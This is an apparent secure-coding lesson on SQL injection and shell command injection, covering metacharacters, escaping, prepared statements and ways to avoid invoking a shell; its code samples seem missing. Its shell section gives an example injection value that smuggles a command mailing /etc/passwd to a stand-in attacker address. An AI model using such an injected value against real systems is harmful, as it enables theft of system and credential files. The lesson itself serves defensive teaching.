Les 2 - Passing data to subsystems
SQL Injections en Shell injections.
Most dynamic web applications pass data to one or more subsystems:
- SQL databases
- Operating systems
- Libraries
- Shell command interpreters
- XPath handlers
- XML documents
- Legacy systems
- Users’ browsers
We communicate with these subsystems by building strings that contain some control information, and some data.
To our application, the data parts of what we send are just strings; sequences of characters. The characters strings may represent names, addresses, passwords, entire web pages, and just about everything.
When our application passes data around, the strings may reach a system in which one or more of the characters are not treated as plain text, but as something special.
When passing the border between our application and that subsystem, the character changes from being an information-carrying piece of a text to becoming a control character.
It has become a metacharacter, as it rises above the pure data.
Metacharacters are needed for many things, and they do not pose a threat by themselves. The problems is raised when developers think they are passing pure data, and those “data” are found to contain characters that make the subsystem do something else than we expect.
An attacker may be able to control what the subsystem does, by passing control information to the subsystem.
SQL Injection
In SQL Injection, an attacker is able to modify or add queries that are sent to a database by playing with input to the web application. The attack works when a program builds queries based on strings from the client, and passes them to the database server without handling characters that have special meaning to the server.
The issue:
Suppose we would like to make a web application that requires users to log-in
through a form:
How does a hacker attack it?
As our program just inserts the input unmodified in the query, what eventually is sent to the database looks like this:
The two hyphens (- -) make up an SQL comment introducer. It effectively inactivates the test for a matching password!
Does it solve the issue if we filter out that double hyphen? No. The hyphens are not part of the problem at all.
The real problem: The attacker is allowed to make the SQL parser switch context.
The solution involves metacharacters.
We should make them lose their special meaning, Either by handling them manually, or preferably by building queries in a way in which there are no metacharacters.
- Neutralizing SQL metacharacters
- Using prepared statements
Character replacement solution in PHP:
Prepared statements
Instead of handling the escaping of SQL metacharacters ourselves, we could use prepared statements.
In this method, query parameters are passed separately from the SQL statement itself.
When using prepared statements, there are no metacharacters.
Java example:
- We don’t need to remember all that metacharacter handling.
- Prepared statements generally execute faster than plain statements, as they get parsed only once by the database server.
Shell Command Injection
Programs written in web programming languages, such as Perl and similar languages often rely heavily on running external commands to perform many tasks. When a Perl program runs an external command, the interpreter will in many cases leave the actual running of the program to an operating system shell, such as sh, bash, csh or tcsh.
Unfortunately, shells typically understand a large set of metacharacters, and one risks major security problems if one doesn’t do any filtering.
In Unix, there has traditionally been a file called /etc/passwd
that contains information of all users, including hashed representations of their passwords.
Imagine a Perl-based CGI script that for some reason sends someone an E-mail.
The E-mail is sent by piping the contents of the mail through the sendmail program. It needs the recipient address on the command line.
The password-stealing intruder registers with the following “E-mail address”:
foo@bar.example; mail badguy@badguy.example < /etc/passwd
When included in the sendmail invocation in the open statement above, the commands executed by the shell will be:
/user/sbin/sendmail foo@bar.example;
mail badguy@badguy.example < /etc/passwd
- First that call to sendmail.
- Then a semicolon which again functions as a command separator
- Finally a call to another common Unix mailer, mail, that actually passes the entire
to the attacker.
Avoiding shell command injection
- Identify when the shell is being used.
- Handling and Disarming the shell metacharacters.
- Avoiding user input in the command arguments.
- Managing without the shell.
1. Invocation of the shell
Identify the functions in your programming language that pass data to a command shell, or the ways to invoke a shell.
2. Handling the shell metacharacters
Different shells have different metacharacters, and the use of the metacharacters differs too.
Metacharacters in Bash (GNU Bourne-Again SHell):
Solution 1: single quote encapsulation
The single quote encapsulation is the strictest way to make the shell treat a text as just plain text.
- The single quotes are thus good for encapsulating data that do not contain single quotes.
- If data contain single quotes, we can still use single quote encapsulation if we split the string on all single quotes and glue quoted strings together using a backslash-escaped single quote.
Solution 2: Double quote encapsulation
Another approach is to encapsulate the data string in double quotes.
- Inside a doubly quoted string, all characters except the following characters lose their special meaning:
$ ` " \
- Occurrences of these four special characters must be escaped using a backslash.
Solution 3: escape every metacharacter
A third approach is to escape every metacharacter in the data string by prefixing them with a backslash.
It involves what is known as blacklisting. We handle the characters we know are unsafe, and let the rest pass unchanged. There are many metacharacters, and we may easily miss some of them.
Escaping shell metacharacters is hard, particularly if we are not quite sure what kind of shell will be used.
3. Avoiding user input in the command arguments
If we can avoid passing user data on the command line, it becomes simpler.
In such cases neither the shell nor the target program may be tricked into doing nasty stuff by command line arguments.
4. No Shell
In many cases we use the shell just to launch an external program.
If we do not need any of the features provided by the shell, we might just as well start the program directly.
Often, we do not even need to run an external program in order to do the job. For example: for sending E-mails. A person familiar with SMTP (Simple Mail Transfer Protocol) and network programming would be able to write Perl code to do the same in less than 100 lines.